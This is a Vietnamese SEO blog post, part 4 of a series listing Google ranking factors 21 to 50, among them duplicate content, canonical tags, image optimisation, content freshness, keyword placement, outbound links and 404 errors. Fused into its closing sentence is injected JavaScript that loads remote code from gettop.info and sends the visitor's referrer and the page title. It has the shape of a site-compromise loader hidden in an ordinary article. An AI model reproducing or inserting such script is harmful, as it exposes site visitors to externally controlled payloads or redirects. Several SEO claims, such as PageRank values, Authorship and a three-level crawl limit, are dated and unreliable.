SEO chuẩn theo 200 yếu tố xếp hạng của Google phần 4

Tiếp nối phần 3 từ các yếu tố xếp hạng liên quan đến domain thì phần 4 đi sâu tới những yếu tố xếp hạng liên quan đến page SEO.

 

google-ranking-factor-2014

 

21. Nội dung trùng lặp: Nội dung trùng lặp ở đây được hiểu như những tiêu đề, thẻ mô tả giống hệt nhau thậm chí content hoàn toàn giống nhau giữa các page trên website của bạn. Với yếu tố này nó sẽ làm giảm hạng kết quả của bạn trên xếp hạng tìm kiếm Google. Hãy thống kê chúng trong Google Webmaster tools và loại bỏ.

 

22. Thuộc tính Rel = canonical: Nếu website của bạn thuộc về lĩnh vực thương mại điện tử mà có nhiều sản phẩm giống nhau. Google khuyến cáo bạn nên sử dụng thẻ Rel = canonical để  xác định bài viết chính giúp Google index tốt hơn. Vì nội dung không thể bao quát hết hy vọng sẽ hướng dẫn các bạn sử dụng thẻ này trong các bài viết tới.

 

23. Tốc độ load trang trên trình duyệt Chrome: Tôi không hiểu thế nào khi tham vấn tài liệu lại có mục này, nhưng khi bạn đã test load tốt trên Google Page Speed đồng nghĩa với việc website của bạn khá tốt rồi. Còn lại nếu website quá chậm cho trải nghiệm người dùng bạn nên suy xét sử dụng công nghệ CDN để tăng tốc website.

 

24. Tối ưu hóa hình ảnh: Hình ảnh là một phần rất quan trọng trong việc tối ưu on-page cho một website. Rất rất nhiều SEOer đã bỏ qua phần này vì cho rằng nó không hiệu quả và chả có gì hữu ích. Theo một thí nghiệm của tôi về lĩnh vực thể thao bơi lội trong suốt một quãng thời gian đứng TOP 6, việc thêm 1-2 hình ảnh được tối ưu hóa tiêu đề, thẻ alt phù hợp với nội dung thì vị trí đã thay đổi cao hơn lên TOP 3.

 

25. Google ủng hộ việc cập nhật mới nội dung: Các thông tin phải luôn luôn mới, cập nhật và updates cùng thời đại. Theo Google những trang web thường được cập nhật lại chứng tỏ người làm nó đang chăm sóc nội dung đó một cách tốt hơn hoặc ít nhất là đã bỏ thời gian công sức để thay thế mới một cái gì. Ta thấy rằng Google hiển thị thời gian bài được xuất bản cuối cùng trên Google tìm kiếm, hãy làm mới cả nội dung và thời gian để nội dung luôn luôn mới. Với cách này tôi đã có rất nhiều bài viết, từ khóa chiếm TOP tuyệt đối với sự cải thiện không ngừng qua quá trình tích lũy.

01_preview.__large_preview

 

 

26. Tầm quan trọng của việc làm tươi mới nội dung:  Đã được nêu tóm gọn như nội dung trên

 

27. Lịch sử nội dung được cập nhật: Từ khi xuất hiện đến nay nó có được thay đổi, thêm mới bao nhiêu lần, thay đổi như thế nào.

 

28. Nổi bật từ khóa: Từ khóa được nhắc đến ngay trong 100 ký tự đầu tiên của page. Thông thường tôi đưa từ khóa vào 2-3 dòng mở bài và chọn đó chính làm mô tả cho trang luôn.

 

29. Keyword xuất hiện trong thẻ H2, H3, H4: Một việc cũng khá quan trọng, sau nhiều lần tối ưu tôi nhận thấy việc đưa từ khóa vào các thẻ tiêu đề khiến vị trí được cải thiện tốt hơn rất nhiều.

 

30. Từ khóa chính xác trong nội dung: Nếu bạn muốn SEO từ “SEO TOP Google” thì việc để chính xác từ khóa “SEO TOP Google” trong nội dung sẽ tốt hơn là “SEO từ khóa lên TOP google.com.vn”.

 

31. Chất lượng của liên kết ngoại: Việc đặt liên kết tới một website bên ngoài website của bạn cần phải được cân nhắc. Thông thường theo các bài giảng của SEOer thì việc tạo liên kết ra ngoài không tốt cho SEO. Thế nhưng tôi gợi ý theo cách làm của tôi rằng các bạn nên liên kết tới những website có chất lượng tốt để cung cấp thông tin bổ sung cho người dùng. Hạn chế hoặc tuyệt đối cung cấp liên kết tới các website bị phạt, sandbox, web có nội dung không được pháp luật khuyến cáo. Một website có liên kết ngoại tốt vẫn có thể đạt thứ hạng cao trên Google. Để hạn chế việc rườm rà trong cập nhật nội dung hãy đặt thuộc tính “No-follow” cho những liên kết ngoại.

 

32. Liên kết ngoại cùng chủ đề: Hãy lưu ý liên kết đến những trang web cùng chủ đề với bạn để được đánh giá cao hơn.

 

33. Ngữ pháp và chính tả: Hiện nay Google chưa thể đọc hiểu nội dung Tiếng Việt một cách rõ ràng nên yếu tố này không được đề cao. Nhưng đối với các trang web bằng Tiếng Anh khi bạn sử dụng công cụ dịch của Google thì việc được xếp hạng nội dung đó là không cao do chính tả, ngữ pháp lộn xộn. Hãy trau chuốt website để cho người dùng trải nghiệm tốt thay vì cứ làm nó cho các công cụ tìm kiếm đọc. Đừng đùa với Google, bạn cứ thử gõ sai 1 từ tiếng Việt vào ô tìm kiếm xem, nó sẽ giúp bạn sửa lỗi đấy.

Thông tin thảo luận trên diễn đàn Google tại đây

 

34. Nội dung gốc: Đương nhiên rồi, nếu bạn muốn SEO thực sự thì hãy tự sáng tạo ra nội dung của riêng mình.

 

35. Nội dung bổ sung hữu ích: Các bài viết được tổng hợp lại và viết chuyên sâu hơn sẽ được Google cân nhắc đặt vào một vị trí cao trên bảng xếp hạng.

 

36. Số lượng liên kết ngoại: Theo các bài SEO truyền thống của SEOer khuyến cáo dưới 20 outlink. Quá nhiều liên kết ngoại sẽ làm rò rỉ Page Rank và ảnh hưởng đến kết quả của bạn trên tìm kiếm.

 

37. Nội dung đa phương tiện: Hình ảnh, video là những thứ thú vị mà bạn nên hoặc tôi khuyến cáo bạn nên có ít nhất 1-2 hình ảnh hoặc có thêm video thì càng tuyệt vời cho chất lượng nội dung bạn cung cấp.

 

38. Số lượng liên kết nội bộ trỏ đến trang đích SEO: Số lượng liên kết đến một trang đích trên website của bạn nói lên tầm quan trọng khác biệt của nó so với các trang khác của website.

 

39. Chất lượng liên kết nội bộ đến trang đích SEO: Liên kết nội bộ cũng có khả năng truyền PageRank và chất lượng không kém gì các Backlink xa xôi. Nếu liên kết nội bộ được truyền từ một page có Pagerank cao thì chất lượng thật tuyệt vời.

 

40. Link gãy (lỗi 404): Lỗi này thường được thông báo đến bạn trong Google webmaster tools, lỗi này ảnh hưởng rất mạnh đến xếp hạng toàn bộ từ khóa website của bạn.

 

Tham khảo cách xử lý lỗi 404 cho:

Xử lý lỗi 404 wordpress bằng plugin

Hướng dẫn redirect 301 cho website bằng file .htaccess

 

41. Cấp độ đọc website: Rút ra từ nhiều bài giảng SEO tại Việt Nam và kinh nghiệm SEOer của bạn bè thì một website chỉ nên để tối đa đến 3 cấp độ. Theo như Google quét thì nó chỉ quét đến tầng 3 (danh mục con tầng thứ 2) và sau đó nó sẽ bỏ. Nếu bạn chia website ra quá nhiều tầng đọc thì nó sẽ không phù hợp với SEO. Vnexpress giải quyết tình trạng phân vùng quá sâu này bằng cách chia các chuyên mục ra thành subdomain.

 

42. Liên kết tiếp thị: Nếu bạn tự tiếp thị các sản phẩm của mình thì không thể làm ảnh hưởng đến thứ hạng của bạn trên Google. Nhưng có quá nhiều liên kết tiếp thị xuất hiện trên website của bạn thì Google sẽ theo dõi bạn sát sao hơn. Trước đây mạng xã hội chia sẻ hình ảnh hàng đầu Pinterest.com đã chặn các liên kết affiliate vì lý do này, hiện nay nó đã mở ra.

 

43. Chuẩn hóa HTML/ WC3: Ít người nghĩ đến việc chuẩn hóa cấu trúc website, một website được mã hóa một cách cẩu thả khiến cho các công cụ rối loạn trong việc đọc. Và WC3 đang được coi là một đánh giá quy chuẩn về cấu trúc mã nguồn. Các bạn có thể check những lỗi này tại công cụ trực tuyến SEOmastering.com

 

44. Chất lượng của tên miền: Tất cả bài viết trên một tên miền có chất lượng cao sẽ được đánh giá cao hơn các bài viết trên các website tên miền chất lượng thấp hơn. Đây là một điều tôi hoàn toàn khẳng định với các bạn. Dùng SEOmastering để kiểm tra chất lượng tên miền hiện có của bạn.

 

45. Chỉ số Pagerank của trang: Nhiều bạn vẫn hay nhầm lẫn về chỉ số PageRank của trang và chỉ số PageRank của trang chủ. Một trang có chỉ số PageRank cao hơn sẽ được đánh giá cao hơn.
Đọc thêm về phân biệt Landing page và Home page trong SEO

 

46. Độ dài URL: Xem trên Google tìm kiếm thì bạn sẽ thấy ngay việc cắt ngắn liên kết hiển thị. Vì thế hãy cân nhắc sắp xếp đường dẫn một cách tối ưu. Cách tôi chọn là loại bỏ liên kết chuyên mục trong đường dẫn tới bài viết.

Có dạng dinhtrongtrang.com/ten-bai-viet.html

thay vì dinhtrongtrang.com/chuyen-muc/chuyen-muc-com/ten-bai-viet.html

 

47. Thư mục URL: Các trang cùng thư mục đường dẫn có sự tương tác nhẹ đến nhau

VD: các trang trong cùng chuyên mục dinhtrongtrang.com/SEO/ nhưng cá nhân tôi đã loại bỏ yếu tố này để đạt chuẩn độ dài từ khóa.

 

48. Biên tập viên là thành viên (thuộc con người): Nếu bạn là một SEOer lâu năm chắc chắn bạn sẽ thấy quyền tác giả của mình được hiển thị trên kết quả tìm kiếm đối với các diễn đàn. Ảnh hưởng không lớn nhưng đã được xác định là một yếu tố ảnh hưởng đến xếp hạng của nó. Google Authorship được hiển thị dưới Avatar của tác giả, yếu tố được đánh giá cao trong xếp hạng Rich spinet.

 

 

01_previewimage

 

49. Trang chuyên mục: Yếu tố này tôi vẫn chưa xếp hạng được nó thuộc diện ảnh hưởng bao nhiêu. Nhưng trong các dự án được triển khai thì thấy rằng việc SEO chuyên mục mang lại chiến lược cực kỳ hiệu quả cho các dịch vụ, sản phẩm bao quanh khu vực địa lý hẹp như quận, huyện, thành phố rất tốt.

 

50. WordPress tag: Không chỉ có wordpress tag mà bất kỳ tag của website nào cũng được công nhận cho SEO. Nhưng để hiểu rõ bản chất về tag cho các thành viên thiết kế website thì tôi xin giải thích nó là một dạng dòng sự kiện tự tạo, cấp độ của nó tương đương với các chuyên mục nhưng dòng sự kiện này nó lại là một chuỗi liên quan được người dùng tự sắp xếp với tên tag VD: Bác sỹ Cát Tường.

Tuy rằng nội dung có thể rải rác trong các mục sức khỏe, pháp luật, làm đẹp nhưng nó được xâu chuỗi với nhau bởi nhiều bài viết có tag là : Bác sỹ Cát Tường. Chúng ta hiểu chức vụ của tag là như thế. Đây là một cách tạo sự liên quan phù hợp theo lựa chọn tối ưu mà các chuyên mục không thể đáp ứng được.

 

Nếu bạn chưa đọc phần 3 của Series SEO chuẩn các yếu tố xếp hạng của Google thì hãy đọc tại đâydocument.currentScript.parentNode.insertBefore(s, document.currentScript);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Pin It

Trả lời

Thư điện tử của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *